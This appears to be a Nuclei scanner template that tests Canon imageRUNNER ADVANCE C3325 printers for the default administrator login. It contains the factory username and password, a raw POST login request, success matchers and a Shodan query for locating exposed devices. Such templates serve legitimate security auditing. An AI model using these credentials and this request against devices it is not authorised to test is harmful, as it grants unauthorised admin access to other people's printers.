Description
No description available.
No description available.
id: canon-c3325-default-login
info:
name: Canon R-ADV C3325 - Default-Login
author: ritikchaddha
severity: high
reference:
- https://oip.manual.canon/USRMA-0618-zz-CS-enLN/contents/1T0002902253.html#:~:text=The%20default%20user%20name%20for,in%20order%20to%20increase%20security.
metadata:
verified: true
max-request: 1
shodan-query: title:"c3325"
tags: canon,c3325,default-login,misconfig,intrusive,vuln
variables:
username: "Administrator"
password: "7654321"
http:
- raw:
- |
POST /login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
uri=%2F&user_type_generic=true&deptid={{username}}&password={{password}}
host-redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- "writeln('Log Out"
- "Remote UI : Portal"
condition: and
- type: status
status:
- 200
# digest: 4a0a00473045022100beac58d23835b1b2f822d1547b67d79ec12a692b29828ba53271e1c92e48bae70220611a44abdab5994653092a675823824ad9d678c7679916396610e31d64c53d18:922c64590222798bb761d5b6d8e72950
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.